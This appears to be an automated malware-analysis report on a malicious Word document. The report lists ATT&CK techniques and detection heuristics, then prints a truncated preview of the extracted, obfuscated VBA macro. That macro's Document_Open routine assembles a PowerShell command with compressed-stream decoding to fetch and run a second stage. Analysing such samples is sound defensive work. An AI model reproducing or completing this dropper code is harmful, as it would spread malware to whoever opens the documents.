Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open macro that calls the Shell() function to execute a PowerShell command. That command downloads and executes content from a benign-looking URL, which is likely a second-stage payload. The ClamAV detection also confirms its malicious nature.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6606419-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6606419-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20111 bytes |

SHA-256: 5e5b889ed5b91d16e5c07630530049d290532cef99cdece624e197fbb1baf24e

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "qaWkorNWaSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
htrPm = (wkkto / vYUpl / LDOkmB - EZQRir / (63946 * jtuPA - 47275 + AaftCM + (RjjHDa * twGpk / niTGCH + OfZal / (kCoFt * RRIjkX))))
tnwoZ = (qoSGZ / vLZlGG / mqHEr - rSQiw / (67119 * OBHaik - 2089 + awkhf + (DGrWd * BAQljF / iwaJTY + ctDwDW / (zMuXX * LnMYI))))
PvjBBw = (JNIhG / MmZNHG / VmdKf - OffbPI / (61455 * tXpzlS - 80187 + LBVnsu + (caOHzY * RZWMjo / msZarS + jPWnY / (abprwT * CABAiK))))
iuaRmGSzia ("" + OlWrdJSZzmQJ + KCtTHZCnVO + pjwTAqwMjz + oQsoXiNEBA + bVOWoA + bZiBCYIwM + YsKsTZiDqki)
vblrY = (jCIToz / WnBSt / usUJqJ - JbMPjw / (17415 * FanQX - 39393 + ZPZWu + (CvCXr * VYbSvi / jEqtns + mRNOBV / (ZSFkU * RGjKr))))
nuiIri = (lQiVmi / clhoW / pwFWh - UacXfC / (96316 * ArmFWT - 83006 + Ikjwq + (pVzWV * HrpIa / NEJsC + oiGkw / (RCdPnU * jkMlGY))))
End Sub
Attribute VB_Name = "inJCdiFFnQQh"
Function pjwTAqwMjz()
On Error Resume Next
Mfnkao = 16415 * MKTia - GrbwW * fdSrOA / (vlQwU / 84089 * FGSiZt + ZlcnU) * (IVErY + PQjMwV)
MTwLz = 82157 * AAYsZc - FrqDu * QZhYah / (OVtVNz / 57702 * FpQod + IVfwz) * (sKsWs + swnmXl)
ndZfHfi = "pow" + fGCfZwRABaPR + EBabWkEd + "ers" + nGfRTSiWPrd + TZLaKqvdJkq + "h" + zKvdcBiZsSTA + vsBQfpZGBLJt + "ell" + ziWoiiVUblP + CbGradHzkHUL + " " + qIjUiOGZ + fRwNbRQADIXfuT + " " + fcPWBdpXf + QhNadNKMIftYT + ".(" + HknKNQlSii + uCcaiQZzTqitS + " $v" + almDvfhV + UzbfPivSVQJf + "erb" + IurARCtr + KjvaOLMj + "o" + NSzTELnbwUwuj + BnhEBpdTTUijUE + "s" + cHNwpwX + PSuJKPz + "Epr" + NYfcWAkwiwW + XmQVnTfGE + "ef" + wmXiKJEiPpql + kMMqSYZ + "E" + vIsocjoYIItdkd + VunNcjAsUCHSP + "r" + LVpbaSUcCaQid + AiKCwimPUP + "EN" + UZZWIVR + vBbVBRkm + "C" + WNzCYINqLZFVMS + DdEINMw + "E.T"
hijvN = 3039 * IRkmWW - OvfFI * apJDB / (HiDkK / 32395 * zrZjuw + cMuif) * (jcpNiG + NirZcu)
uEhZVo = 47303 * oOkHl - NuaXX * fsqBEc / (TzAEA / 97129 * iHNIKp + SBzwz) * (pRzwF + SOBOf)
zizrUArH = "OSt" + FKoKjJHpFj + hZNrqDEaf + "ri" + BzdjPht + RVCHNpOquzMR + "n" + ptAJXcQRoEJmK + sILzfvLWFiB + "G" + jfokVHomO + FWzhwzaiIN + "()" + ARAvdWvfWnBlI + RDRpdlqtJw + "[1," + HEXjBdpoSU + QTszSUNY + "3]" + JarXYFKXrz + nbwGAITaGwrFZJ + Chr(43) + "'" + boiGojuwpiFji + MNRjQALUFEI + "X'" + jlzOMTwC + JEjCQVCjwMTis + "-j" + cqPUcCjRhME + XKwavVHckwvwC + "O" + FtFtplkd + opdmwpMoMMlN + "IN'" + WAArrUVZhULo + qFmhStHj + "'" + lJiJqHZsBWWpk + LLOIIbKiBzGZ + ")("
wiHFA = (rYVkpI - wHtihM + 79609 - GEdUP + 97980 + OJkMO * 36699 / IvTzhr) + (mmHEOo / NFkWc)
zbqVLF = (mMiZuT - koBVuw + 14114 - sYVOba + 63830 + kiWzC * 90955 / TYmCYz) + (iOIXzM / lfHnRj)
Zikkzo = (LzdtO - wwOii + 95586 - TRVPA + 19383 + AEApma * 72419 / RiOiDf) + (miLzUY / qBsia)
zaGUaVcGpB = "ne" + UkpJJHzn + iPhfTvuntirEA + "w-" + lOwwHzP + OisuVTnq + "obj" + lJhKiwkn + RQjzCXsArzp + "EcT" + YRoDzRarAApDz + QAWLmzr + " " + srwamzEVSUIstt + ClQPtwFSok + "sys" + ihrhTtKISzE + TkdwLWGmojLbiB + "Tem" + jmBIbrlcbYAj + DhQSaLc + "." + OkqpwfGlrNW + DsVczAUn + "IO." + JkfiLPbkJJ + YkCmwVnIVGSqd + "Co" + zLbBosNhFSBvVP + cCQTlZND + "mpr" + MBCRoAnSdZhHVu + wUvaSss + "e" + oNEMYwYCpfLin + HCmDiUj + "s" + idtHYhTJ + AniFFaJFjOz + "siO"
pvSPG = (PVHrui - FQdHLC + 41592 - dNZwj + 55090 + PAHKJ * 38254 / MGRNT) + (GsvobK / sbYCw)
XCmIvvIFKaU = "N.d" + itSaMtGH + UbCEXpwibFlR + "e" + VHdnbENHWr + znHAzkKDH + "fl" + nEjDNaraQ + EFQSjfXNELaJqL + "ATE" + FBHhNmnpisA + fROECiBkhEf + "s" + fINussmzlYJajS + jniXjYtMFoc + "Tre" + YzcCTGfbnzINh + FiSQkJzQAINGO + "aM" + EPMIMbjYPLmzv + KziBGaVLph + "( " + btGAQZwvsAY + YFDFzKBdd + "[" + bMuOjEXal + iILVZzs + "SY"
PPuXL = (nVSzH - tcSpu + 80975 - wkcMsi + 14537 + qpDKI * 20246 / MwztmQ) + (qZJbJ / pbZmzj)
azkiV = (GrXZD - vtYEij + 22690 - cwwVTa + 89269 + ckEkAo * 74218 / bMtRwj) + (LsHiP / RuOjpj)
sjHWR = "St" + DCsEEzfOmzwQ + qADjhtDCQV + "eM" + OQRLYiMZ
... (truncated)